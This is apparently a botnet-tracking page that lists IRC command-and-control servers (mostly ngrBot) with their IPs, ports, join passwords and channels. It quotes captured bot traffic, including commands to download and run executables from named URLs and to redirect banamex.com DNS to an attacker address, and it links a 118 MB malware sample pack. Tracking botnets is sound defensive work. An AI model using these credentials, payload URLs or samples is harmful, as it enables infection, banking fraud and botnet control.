Remote Host Port Number 31.3.254.125 6667 NICK USA|2953864 USER snzefqx 0 0 :USA|2953864 JOIN #Skk k3y USERHOST USA|2953864 MODE USA|2953864 -x+i PONG :HTTP1.4 hosting infos: http://whois.domaintools.com/31.3.254.125
92.241.165.221(irc botnet hosted in Russian Federation Moscow Oao Webalta)
server 92.241.165.221:1234 PASS ngrBot (Channel: #!nigro!) Now talking in #!nigro! Topic On: [ #!nigro! ] [ ] Topic By: [ spin ] PRIVMSG #test :[DNS]: Blocked 1310 domain(s) – Redirected 0 domain(s) NICK n{US|XPa}eyqlyzj USER eyqlyzj 0 0 :eyqlyzj JOIN #test ngrBot PRIVMSG #test :[HTTP]: Updated HTTP spread interval to “2” PRIVMSG #test :[MSN]: UpdatedRead more...
62.122.246.165(irc botnet hosted in Russian Federation St. Petersburg Ooo Set)
server 62.122.246.165:48912 (Channel: ##net) psybnc wich conect to botnet found by _char hosting infos: http://whois.domaintools.com/62.122.246.165
ryan1918.has.zero-security.org(ngrBot hosted in Netherlands Amsterdam Ecatel Ltd)
Remote Host Port Number 199.15.234.7 80 89.248.168.244 80 89.248.168.231 6869 PASS ngrBot PRIVMSG #ng# :[d=”http://zbavitu.net/Output.exe” s=”614400 bytes”] Executed file “C:Documents and SettingsUserNameApplication Data1.tmp” – Download retries: 0 NICK n{US|XPa}cratgwz USER cratgwz 0 0 :cratgwz JOIN #ng# ngrBot PRIVMSG #ng# :[MSN]: Updated MSN spread message to “http://goo.gl/ZtByX |” PRIVMSG #ng# :[MSN]: Updated MSN spread interval toRead more...
76.11.234.57(irc botnet hosted in United States Manchester New Wave Communications)
Remote Host Port Number 76.11.234.57 6667 PASS jspdmm880 NICK [2953|USA|XP|Z3R0x] USER 2953 “” “lol” :2953 JOIN #bettafish jspdmm8809 PONG :Kottonmouth.irc hosting infos: http://whois.domaintools.com/76.11.234.57
178.86.133.1(ngrBot hosted in Ukraine Tehnologii Budushego Llc)
Remote Host Port Number 178.86.133.1 1865 PASS ngrBot 178.86.30.65 1865 PASS ngrBot 91.211.117.162 1865 PASS ngrBot 199.15.234.7 80 NICK n{US|XPa}fdoiggo USER fdoiggo 0 0 :fdoiggo channel #main Now talking in #main Topic On: [ #main ] [ .m on .mdns www.banamex.com 46.166.147.124 .mdns www.banamex.com.mx 46.166.147.124 .mdns banamex.com 46.166.147.124 .mdns banamex.com.mx 46.166.147.124 .mdns http://www.legoville86.com/f1gp/set.txt ] TopicRead more...
118mb malware samples
Here another big package with diferent malwares rats,bots,bankers etc Download: http://adf.ly/2VVxU
79.143.180.226(ngrBot hosted in Germany Giga-hosting Gmbh)
Remote Host Port Number 199.15.234.7 80 82.165.68.180 80 79.143.180.226 7475 PASS ngrBot NICK n{US|XPa}ccrfuan USER ccrfuan 0 0 :ccrfuan JOIN ##cybercenter## ngrBot JOIN #US PRIVMSG ##cybercenter## :[DNS]: Blocked 0 domain(s) – Redirected 20 domain(s) Now talking in ##cybercenter## Topic On: [ ##cybercenter## ] [ ~upd http://www.iesps.org/videotutoriales/downloads/six.exe 16031D71183EC6D2DEB1C197D6254CD8 ~mdns http://www.sebastian.pfotenhauer.de/downloads/nsas4.txt ~s ] Topic By: [ sphinxRead more...
77.79.9.26(irc botnet hosted in Lithuania Siauliai Splius Uab)
server 77.79.9.26:1337 (Channel: #modzinstalls)and #gBot Local users: Current Local Users: 246 Max: 1016 Global users: Current Global Users: 246 Max: 590 Now talking in #modzinstalls Topic On: [ #modzinstalls ] [ !download http://dl.dropbox.com/u/20441069/Testing/fg.exe 1 ] Topic By: [ modz ] Modes On: [ #modzinstalls ] [ +pt ] found by _char hosting infos: http://whois.domaintools.com/77.79.9.26
178.63.199.11(irc botnet hosted in Germany Gunzenhausen Hetzner Online Ag)
server 178.63.199.11:1337 found by _char hosting infos: http://whois.domaintools.com/178.63.199.11